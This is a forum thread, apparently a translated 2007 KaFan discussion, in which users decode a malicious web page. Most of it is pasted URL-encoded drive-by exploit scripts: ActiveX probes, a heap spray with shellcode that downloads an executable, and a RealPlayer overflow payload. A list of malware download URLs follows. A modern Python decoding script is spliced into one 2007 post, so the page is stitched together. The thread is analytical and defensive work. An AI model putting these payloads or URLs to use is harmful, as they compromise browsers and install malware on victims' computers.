[Identified] Can someone take a look at this?

qianwenxiang
Posted on 2007-12-25 20:23:10
src=http://www.im54.com/go.js></script><script language="JavaScript" type="text/javascript"

jumpto
hxxp://service-google.cn/vip/wm2/index.html
hxxp://service-google.cn/vip/wm2/pps.html
hxxp://service-google.cn/vip/wm2/real.html
jimmyleo
Posted on 2007-12-25 20:45:01
Looks like it has already gone dead……?
Axiang, why not just paste it here directly?
qianwenxiang
OP | Posted on 2007-12-25 21:18:59

Reply to post #2 by jimmyleo

Looks like it has 2 layers of encoding.. I decoded one layer and then got stuck.
index.htm
<script>
        window.onerror=function(){return true;}
        window.status="完成";
</script>
<script language="javascript">
        var qq141809="%3CHtml%3E%0D%0A%3CBody%3E%0D%0A%3Cnoscript%3E%0D%0A%3Ciframe%20src%3D*%3E%3C/iframe%3E%0D%0A%3C/noscript%3E%0D%0A%3Cscript%20language%3D%22javaScript%22%3E%0D%0Afunction%20init%28%29%7Bdocument.write%28%29%3B%7D%0D%0Awindow.onload%20%3D%20init%3B%0D%0Aif%28document.cookie.indexOf%28%27Cuteqqs%27%29%3D%3D-1%29%7B%0D%0Atry%7Bvar%20e%3B%0D%0Avar%20ado%3D%28document.createElement%28%22object%22%29%29%3B%0D%0Avar%20str%3D%22c%22+%22lsid%3AB%22+%22D96C%22+%22556-65A3-11D0-983A-00C04FC29E36%22%3B%0D%0Aado.setAttribute%28%22classid%22%2Cstr%29%3B%0D%0Avar%20as%3Dado.createobject%28%22Adodb.Stream%22%2C%22%22%29%7D%0D%0Acatch%28e%29%7B%7D%3B%0D%0Afinally%7B%0D%0Avar%20expires%3Dnew%20Date%28%29%3B%0D%0Aexpires.setTime%28expires.getTime%28%29+24*60*60*1000%29%3B%0D%0Adocument.cookie%3D%27Cuteqqs%3Dqq141809%3Bpath%3D/%3Bexpires%3D%27+expires.toGMTString%28%29%3B%0D%0Aif%28e%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27614.html%27%3E%3C%5C/iframe%3E%22%29%7D%0D%0Aelse%7B%0D%0Atry%7Bvar%20r%3Bvar%20reals%3Dnew%20ActiveXObject%28%22IERPCtl.IERPCtl.1%22%29%3B%7D%0D%0Acatch%28r%29%7B%7D%3B%0D%0Afinally%7Bif%28r%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27bf.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bvar%20h%3Bvar%20pps%3Dnew%20ActiveXObject%28%22POWERPLAYER.PowerPlayerCtrl.1%22%29%3B%7D%0D%0Acatch%28h%29%7B%7D%3B%0D%0Afinally%7Bif%28h%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27pps.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bvar%20i%3Bvar%20thunder%3Dnew%20ActiveXObject%28%22DPClient.Vod%22%29%3B%7D%0D%0Acatch%28i%29%7B%7D%3B%0D%0Afinally%7Bif%28i%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27xl.html%27%3E%3C%5C/iframe%3E%22%29%7D%7D%0D%0Atry%7Bva
r%20j%3Bvar%20lianzhong%3Dnew%20ActiveXObject%28%22GLCHAT.GLChatCtrl.1%22%29%3B%7D%0D%0Acatch%28j%29%7B%7D%3B%0D%0Afinally%7Bif%28j%21%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27lz.html%27%3E%3C%5C/iframe%3E%22%29%7D%0D%0Aif%28r%3D%3D%22%5Bobject%20Error%5D%22%26%26h%3D%3D%22%5Bobject%20Error%5D%22%26%26i%3D%3D%22%5Bobject%20Error%5D%22%26%26j%3D%3D%22%5Bobject%20Error%5D%22%29%7B%0D%0Adocument.write%28%22%3Ciframe%20width%3D%270%27%20height%3D%270%27%20src%3D%27real.html%27%3E%3C%5C/iframe%3E%22%29%0D%0A%7D%7D%0D%0A%7D%7D%7D%0D%0A%3C/script%3E%0D%0A%3Cscript%3Ewindow.onerror%3Dfunction%28%29%7Breturn%20true%3B%7D%3C/script%3E%0D%0A%3C/Body%3E%0D%0A%3C/Html%3E";
        qq141809=unescape(qq141809);
        document.write(qq141809);
</SCRIPT>
<iframe width='0' height='0' src='real.html'></iframe>


pps.htm
<script>window.onerror=function(){return true;}</script>
<script language="javascript">
        var qqstr="%3Cscript%3E%0D%0Aurl%3D%22%25u7468%25u7074%25u2f3a%25u642f%25u776f%25u2e6e%25u616d%25u616c%25u6373%25u632e%25u2f6e%25u7070%25u2e73%25u7865%25u0065%22%3B%0D%0Apps%3D%28document.createElement%28%22object%22%29%29%3B%0D%0A%0D%0Avar%20str%3D%22clsid%3A5EC%22%3B%0D%0Astr%3Dstr+%227C511-CD0F-42E6-8%22%3B%0D%0Astr%3Dstr+%2230C-1BD9%22%3B%0D%0Astr%3Dstr+%22882F3458%22%3B%0D%0A%0D%0Apps.setAttribute%28%22classid%22%2Cstr%29%3B%0D%0Avar%20s21%3D%22%25u616f%25u4c64%25u6269%25u6172%25u7972%25u0041%25u7275%25u6d6c%22%20%3B%0D%0Avar%20s22%3D%22%25u6e6f%25u5500%25u4c52%25u6f44%25u6e77%25u6f6c%25u6461%25u6f54%22%20%3B%0D%0Avar%20s1%3D%22%25uf3e9%25u0000%25u9000%22%3B%0D%0Avar%20s2%3D%22%25u9090%25u5a90%25ua164%25u0030%25u0000%25u408b%25u8b0c%22%20%3B%0D%0Avar%20s3%3D%22%25u1c70%25u8bad%25u0840%25ud88b%25u738b%25u8b3c%25u1e74%25u0378%22%20%3B%0D%0Avar%20s4%3D%22%25u8bf3%25u207e%25ufb03%25u4e8b%25u3314%25u56ed%25u5157%25u3f8b%22%20%3B%0D%0Avar%20s5%3D%22%25ufb03%25uf28b%25u0e6a%25uf359%25u74a6%25u5908%25u835f%25u04c7%22%20%3B%0D%0Avar%20s6%3D%22%25ue245%25u59e9%25u5e5f%25ucd8b%25u468b%25u0324%25ud1c3%25u03e1%22%20%3B%0D%0Avar%20s7%3D%22%25u33c1%25u66c9%25u088b%25u468b%25u031c%25uc1c3%25u02e1%25uc103%22%20%3B%0D%0Avar%20s8%3D%22%25u008b%25uc303%25ufa8b%25uf78b%25uc683%25u8b0e%25u6ad0%25u5904%22%20%3B%0D%0Avar%20s9%3D%22%25u6ae8%25u0000%25u8300%25u0dc6%25u5652%25u57ff%25u5afc%25ud88b%22%20%3B%0D%0Avar%20s10%3D%22%25u016a%25ue859%25u0057%25u0000%25uc683%25u5613%25u8046%25u803e%22%20%3B%0D%0Avar%20s11%3D%22%25ufa75%25u3680%25u5e80%25uec83%25u8b40%25uc7dc%25u6303%25u646d%22%20%3B%0D%0Avar%20s12%3D%22%25u4320%25u4343%25u6643%25u03c7%25u632f%25u4343%25u03c6%25u4320%22%20%3B%0D%0Avar%20s13%3D%22%25u206a%25uff53%25uec57%25u04c7%25u5c03%25u2e61%25uc765%25u0344%22%20%3B%0D%0Avar%20s14%3D%22%25u7804%25u0065%25u3300%25u50c0%25u5350%25u5056%25u57ff%25u8bfc%22%20%3B%0D%0Avar%20s15%3D%22%25u6adc%25u5300%25u57ff%25u68f0%25u2451%25u0040%25uff58%25u33d0%22%20%3B%0D%0Avar%20s16%3D%22
%25uacc0%25uc085%25uf975%25u5251%25u5356%25ud2ff%25u595a%25ue2ab%22%20%3B%0D%0Avar%20s17%3D%22%25u33ee%25uc3c0%25u0ce8%25uffff%25u47ff%25u7465%25u7250%25u636f%22%20%3B%0D%0Avar%20s18%3D%22%25u6441%25u7264%25u7365%25u0073%25u6547%25u5374%25u7379%25u6574%22%20%3B%0D%0Avar%20s19%3D%22%25u446d%25u7269%25u6365%25u6f74%25u7972%25u0041%25u6957%25u456e%22%20%3B%0D%0Avar%20s20%3D%22%25u6578%25u0063%25u7845%25u7469%25u6854%25u6572%25u6461%25u4c00%22%20%3B%0D%0Avar%20s23%3D%22%25u6946%25u656c%25u0041%22%3B%0D%0Avar%20s%3Ds1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13+s14+s15+s16+s17+s18+s19+s20+s21+s22+s23+url%3B%0D%0Avar%20shellcode%20%3D%20unescape%28s%29%3B%0D%0As%3D%22%25u9090%22%3B%0D%0As%3Ds+%22%25u9090%22%3B%0D%0Avar%20bigblock%20%3D%20unescape%28s%29%3B%0D%0Avar%20headersize%20%3D%2020%3B%0D%0Avar%20slackspace%20%3D%20headersize+shellcode.length%3B%0D%0Awhile%20%28bigblock.length%3Cslackspace%29%20bigblock+%3Dbigblock%3B%0D%0Afillblock%20%3D%20bigblock.substring%280%2C%20slackspace%29%3B%0D%0Ablock%20%3D%20bigblock.substring%280%2C%20bigblock.length-slackspace%29%3B%0D%0Awhile%28block.length+slackspace%3C0x40000%29%20block%20%3D%20block+block+fillblock%3B%0D%0Amemory%20%3D%20new%20Array%28%29%3B%0D%0Anewm%3Dmemory%3B%0D%0Afor%20%28x%3D0%3B%20x%3C400%3B%20x++%29%20newm%5Bx%5D%20%3D%20block+shellcode%3B%0D%0Avar%20buffer%20%3D%20%27%27%3B%0D%0Awhile%20%28buffer.length%20%3C%20500%29%20buffer+%3D%22%5Cx0a%5Cx0a%5Cx0a%5Cx0a%22%3B%0D%0Apps.Logo%20%3D%20buffer%3B%0D%0A%3C/script%3E";
        qqstr=unescape(qqstr);
        document.write(qqstr);
</SCRIPT>

real.htm
<script>window.onerror=function(){return true;}</script>
<script language="javascript">
var qq141="%3Cscript%3E%0D%0Adocument.writeln%28%22%3CsCrIpT%20LAnGuAgE%3D%5C%22jAvAsCrIpT%5C%22%3Efunction%20RealExploit%28%29%7Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bvar%20user%3Dnavigator.userAgent.toLowerCase%28%29%3Bif%28user.indexOf%28%5C%22msie%206%5C%22%29%3D%3D-1%26%26user.indexOf%28%5C%22msie%207%5C%22%29%3D%3D-1%29return%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bif%28user.indexOf%28%5C%22nt%205.%5C%22%29%3D%3D-1%29return%3BVulObject%3D%5C%22IER%5C%22+%5C%22PCtl.I%5C%22+%5C%22ERP%5C%22+%5C%22Ctl.1%5C%22%3Btry%7BReal%3Dnew%20ActiveXObject%28VulObject%29%3B%7Dcatch%28error%29%7Breturn%3B%7Ddocument.cookie%3D%5C%22Cookie2%3DPOPWINDOS%3Bexpires%3D%5C%22+Then.toGMTString%28%29%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BRealVersion%3DReal.PlayerProperty%28%5C%22PRODUCTVERSION%5C%22%29%3BPadding%3D%5C%22%5C%22%3BJmpOver%3Dunescape%28%5C%22%2575%2506%2574%2504%5C%22%29%3Bfor%28i%3D0%3Bi%3C32*148%3Bi++%29Padding+%3D%5C%22S%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bif%28RealVersion.indexOf%28%5C%226.0.14.%5C%22%29%3D%3D-1%29%7Bif%28navigator.userLanguage.toLowerCase%28%29%3D%3D%5C%22zh-cn%5C%22%29ret%3Dunescape%28%5C%22%257f%25a5%2560%5C%22%29%3Belse%20if%28navigator.userLanguage.toLowerCase%28%29%3D%3D%5C%22en-us%5C%22%29ret%3Dunescape%28%5C%22%254f%2571%25a4%2560%5C%22%29%3Belse%20return%3B%7Delse%20if%28RealVersion%3D%3D%5C%226.0.14.544%5C%22%29ret%3Dunescape%28%5C%22%2563%2511%2508%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.550%5C%22%29ret%3Dunescape%28%5C%22%2563%2511%2504%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.552%5C%22%29ret%3Dunescape%28%5C%22%2579%2531%2501%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.543%5C%22%29ret%3Dunescape%28%5C%22%2579%2531%2509%2560%5C%22%29%3Belse%20if%28RealVersion%3D%3D%5C%226.0.14.536%5C%22%29ret%3Dunescape%28%5C%22%2551%2511%2570%2563%5C%22%29%3Belse%20return%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas
%5C%22%3Bif%28RealVersion.indexOf%28%5C%226.0.10.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C4%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.11.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C6%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.12.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C9%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Delse%20if%28RealVersion.indexOf%28%5C%226.0.14.%5C%22%29%21%3D-1%29%7Bfor%28i%3D0%3Bi%3C10%3Bi++%29Padding%3DPadding+JmpOver%3BPadding%3DPadding+ret%3B%7Dafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BAdjESP%3D%5C%22LLLL%5C%5C%5C%5CXXXXXLD%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BShell%20%3D%5C%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%5C%22%3B%22%29%3B%0D%0Adocument.writeln%28%22PayLoad%3DPadding+AdjESP+Shell%3Bwhile%28PayLoad.length%3C0x8000%29PayLoad+%3D%5C%22ChuiZi%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3BReal%5B%5C%22%5C%5Cx49%5C%5Cx6d%5C%5Cx70%5C%5Cx6f%5C%5Cx72%5C%5Cx74%5C%22%5D%28%5C%22c%3A%5C%5C%5C%5CProgram%20Files%5C%5C%5C%5CNetMeeting%5C%5C%5C%5CTestSnd.wav%5C%22%2CPayLoad%2C%5C%22%5C%22%2C0%2C0%29%3Bafdsffffasdf%3D%5C%22flsdajflasdjfl32rewr231ffas%5C%22%3B%7Dvar%20Then%3Dnew%20Date%28%29%3BThen.setTime%28Then.getTime%28%29+24*60*60*1000%29%3Bvar%20cookieString%3Dnew%20String%28document.cookie%29%3Bvar%20cookieHeader%3D%5C%22Cookie2%3D%5C%22%3Bvar%20beginPosition%3DcookieString.indexOf%28cookieHeader%29%3Bif%28beginPosition%3D%3D-1%29%7BRealExploit%28%29%3B%7D%3C%5C/script%3E%22%29%3B%0D%0A%3C/script%3E";
qq141=unescape(qq141);
document.write(qq141);
</SCRIPT>
jimmyleo
Posted on 2007-12-25 21:25:18
The index page hides the following frames:
[frame]614.html
[frame]bf.html
[frame]pps.html
[frame]xl.html
[frame]lz.html
[frame]real.html
So many hung off one page, and it's another generator kit again……
jimmyleo
Posted on 2007-12-25 21:26:39
solcroft
Posted on 2007-12-25 21:27:33
Originally posted by qianwenxiang on 2007-12-25 22:48
Looks like it has 2 layers of encoding.. I decoded one layer and then got stuck.
index.htm


pps.htm

real.htm

It's basically all decoded already; just run unescape on every %?? sequence and take a look.
jimmyleo
Posted on 2007-12-25 21:27:42
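The "just unescape the %?? and look" step above (and the later question of how to decode such pages) can be done statically, without ever executing the script. The following is an added example written for this page, not code from the thread: it peels unescape() layers recursively (both %XX and %uXXXX, so a %25u... second layer like the one in pps.htm decodes cleanly), folds split literals of the "c"+"lsid:B"+... and "IER"+"PCtl..." kind seen in index.htm and real.htm, and then lists the iframes, URLs, ActiveX ProgIDs and CLSIDs across all layers plus a heap-spray hint. The sample page, the variable names and the example.invalid host are constructed placeholders.

```python
import re
from urllib.parse import quote

# JavaScript unescape() turns %XX into one byte-valued char and %uXXXX into one UTF-16 unit.
ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
# A double-quoted JS string literal that contains at least one such escape sequence.
LIT = re.compile(r'"([^"\n]*%(?:u[0-9a-fA-F]{4}|[0-9a-fA-F]{2})[^"\n]*)"')

def js_unescape(s):
    """Static equivalent of JS unescape(): decode the text, run nothing."""
    return ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def join_concat(s):
    """Fold "c"+"lsid:B" style splits into one literal so IDs become searchable."""
    return re.sub(r'"\s*\+\s*"', '', s)

def peel(html, max_layers=8):
    """Return the page plus every escaped literal in it, decoded layer by layer."""
    layers, todo = [], [html]
    while todo and len(layers) < max_layers:
        cur = join_concat(todo.pop(0))
        layers.append(cur)
        todo += [js_unescape(lit) for lit in LIT.findall(cur)]
    return layers

def indicators(layers):
    """What a defender wants from all layers: frames, URLs, ActiveX targets, spray hint."""
    text = "\n".join(layers)
    return {
        "iframes": sorted(set(re.findall(r"<iframe[^>]*src=['\"]?([^'\" >]+)", text, re.I))),
        "urls": sorted(set(re.findall(r"https?://[^\s'\"<>]+", text))),
        "activex": sorted(set(re.findall(r'ActiveXObject\(\s*"([^"]+)"', text))),
        "clsids": sorted(set(re.findall(r'clsid:([0-9a-fA-F-]{36})', text, re.I))),
        # Dense runs of %uXXXX literals are the classic heap-spray/shellcode fingerprint.
        "spray_hint": any(len(re.findall(r'%u[0-9a-fA-F]{4}', l)) >= 16 for l in layers),
    }

# Constructed two-layer sample in the thread's style; example.invalid is a placeholder host.
INNER = ('<script>var str="c"+"lsid:B"+"D96C"+"556-65A3-11D0-983A-00C04FC29E36";'
         'try{var r=new ActiveXObject("IER"+"PCtl.IERPCtl.1");}catch(e){}'
         "<iframe width='0' height='0' src='real.html'></iframe>"
         'var u="http://example.invalid/pps.exe";var s="' + "%u9090" * 20 + '";</script>')
SAMPLE = ('<script>var qq="' + quote(INNER, safe="") +
          '";qq=unescape(qq);document.write(qq);</script>')

def analyse(page=SAMPLE):
    return indicators(peel(page))

if __name__ == "__main__":
    for key, value in analyse().items():
        print(key, value)
```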
qigang
Posted on 2007-12-25 21:31:52

Reply to post #7 by jimmyleo

Rising Antivirus scan results report

List of virus types removed:

Virus: Trojan.Win32.Mnless.zyt

MAC address: 00:11:5B:F3:6D:69

User source: Internet

Software version: 20.24.12

Attachment: virus.rar (62.2 KB)

ytmss15
Posted on 2007-12-25 21:35:09
Experts, could you teach me how to decode this?
qianwenxiang
OP | Posted on 2007-12-25 21:35:19
The index page hides the following frames:
[frame]614.html
[frame]bf.html
[frame]pps.html
[frame]xl.html
[frame]lz.html
[frame]real.html
So many hung off one page, and it's another generator kit again……
It's basically all decoded already; just run unescape on every %?? sequence and take a look.


I think I've worked it out..

http://down.malasc.cn/614.exe
http://down.malasc.cn/bf.exe
http://down.malasc.cn/pps.exe
http://down.malasc.cn/xl.exe
http://down.malasc.cn/lz.exe
http://down.malasc.cn/real.exe
Copyright © KaFan, KaFan.cn. All Rights Reserved. Powered by Discuz! X3.4. Page generated GMT+8, 2024-12-16 16:44.